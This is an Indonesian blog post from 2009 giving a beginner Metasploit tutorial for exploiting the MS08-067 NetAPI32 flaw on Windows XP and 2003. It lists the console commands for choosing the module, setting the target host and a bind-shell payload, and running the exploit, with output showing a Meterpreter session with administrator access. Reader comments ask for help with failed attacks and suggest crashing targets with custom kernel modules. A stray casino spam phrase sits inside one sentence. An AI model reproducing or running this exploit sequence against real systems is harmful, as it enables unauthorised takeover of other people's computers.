Metasploit Tutorial [newbee Edition]

Posted on 4 May 2009 by

Setelah tersampaikan materi bertemakan Hacking and Security di acara workshop KCS 2009 kamis kemarin, barangkali masih ada yang belum “ngeh” dengan materi yang diberikan, terutama dibagian pemberdayagunaan x-sploit yang berframework..  :??

Jadi, tak buatken tutorial ini, kwkkw… [sebenarnya hanya copas dari blog gw dink…] :D

===============================================================================

Seperti yang telah kita ketahui, metasploit framework adalah sebuah penetration tool yang cukup powerfull dalam melakukan sebuah penestrasi ke sebuah system. Dan ini bisa menjadi sebuah pedang yang mempunyai 2 sisi, digunakan sebagai analyst system tool atau digunakan untuk melakukan kegiatan negatif yang berakhir pada attacking. Melalui artikel ini, saya memberikan salah satu contoh penggunaan MF dalam melakukan sesi gaining access.

Kali ini kita akan menggunakan modul exploit yang akan mem-parsing kelemahan kode pemrograman pada NetAPI32.dll, yang terdapat dalam layanan services bawaan windows. Ini berkaitan juga dengan services NetBIOS (Lagi-lagi netbiosnya windows, setelah bug RPC yang kian menjamur beberapa waktu yang lalu). So, let”s use linux friends.. ;p

Modul ini mempunyai kemampuan mem-bypass DEP( Data Execution Prevention )dalam system operasi Wind*ws. DEP adalah salah satu services di wind*ws yang mempunyai fungsi untuk membantu mencegah/membatasi dampak yang terjadi pada saat ada virus atau nbso online casino reviews sebuah ancaman keamanan [threat security] sedang aktif.
Untuk DEP ini, anda bisa melihat aktif apa tidaknya, pada bagian “Properties” di My Computer, lalu pilih pada bagian “Advanced” dan lihat pada bar “Data Execution Prevention”.
Modul ini bekerja, jika target adalah Wind*ws XP Operatin System (s/d WinXP SP 3), namun juga bisa pada target ber-OS Wind*s 2003, asalkan DEP-nya non aktif.
Ok, langsung kelangkah-nya..

Pertama anda siapkan metasploit dengan update terbaru
(cara ini berlaku untuk minimal versi framework 3.2-testing.5773)

msf > version
Framework: 3.2-testing.5773
Console : 3.2-testing.5773

lalu anda pilih modul exlpoitnya, seperti berikut :

msf > use windows/smb/ms08_067_netapi

untuk petunjuk opsi/pilhan yang bisa anda gunakan anda bisa lakukan :

msf exploit(ms08_067_netapi) > show options

lalu anda set target

msf exploit(ms08_067_netapi) > set RHOST 192.168.54.xx
RHOST => 192.168.54.xx

kemudian anda set PAYLOAD

msf exploit(ms08_067_netapi) > set PAYLOAD Generic/Shell_Bind_TCP

Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi. Untuk kali ini, mudahnya kita pilih Generic/Shell_Bind_TCP, maksudnya kita akan mengambil alih Shell Bind (kalau di lingkungan windows dikenal sebagai Command Prompt) dari target hacking kita.
Untuk setting yang lain, karena kita masih belajar maka biarkan saja default adanya.

kemudian tinggal jalankan EXPLOIT-nya :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Connecting to the target…
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.xx[\BROWSER] …
[*] Triggering the vulnerability…
[*] Transmitting intermediate stager for over-sized stage…(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage…
[*] Uploading DLL (73227 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.54.1:51707 -> 192.168.54.xx:4444)

Dan jika berhasil maka anada akan disuguhi sebuah window baru berisi sebuah layar Command Prompt dari komputer target dan anda mempunyai level administrator.

Oh ya, cara diatas memang sengaja saya gunakan MF yang versi console, sebenarnya ada versi GUI-nya dan juga yang WEB based.
Saya menggunakan console karena saya tertarik dengan quote dari distro linux xcode : hacker tidak membutuhkan tampilan yang memukau ;p
Namun, keputusan akhir terserah pada anda.

Reference :
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://blog.delaforta.net/

Demikian semoga bisa bermanfaat bagi rekan-rekan sekalian.

Related Post

42 Comments

farit

10 February 2012

bang ane mw tanya,, gini ane pake metasploit 3.7.2 di windows 7 setiap mw exploit selalu gagal disitu tertulis nya
[-] exploit exception: Login failed : execution expired
[*] Exploit Complete, but no session was created

nah gitu bang,,solusix gimna tuh bang maklumlah masih newbie


Ailern

15 December 2011

newbie mau tanya cara scan OS sama scan port yang kebuka gmn?


0x1337day

19 September 2011

all ~# kalau mau lebih membuat mesin target menjadi crash,, pake metode LKM (Loadable Kernel Module) aja,, itu modul kagak ada di metasploit,, coding sendiri pake C ma assembly,, sekalian generate makefilenya…


0x1337day

19 September 2011

dan sekalian sebagai catatan untuk semua….
sebelum menentukan port target, alangkah baiknya scan dulu memakai nmap…


0x1337day

19 September 2011

maaf newbie ngomong…
sebelum melakukan penetrasi atau serangan,, sebaiknya tentukan dulu sistem operasi, target daemon service (misal : ssh, telnet, NetBIOS, ftp, finger, atau daemon yang lain terserah anda), baru pilih exploit dan payload yang cocok…..


Post a Comment

Your email is never shared.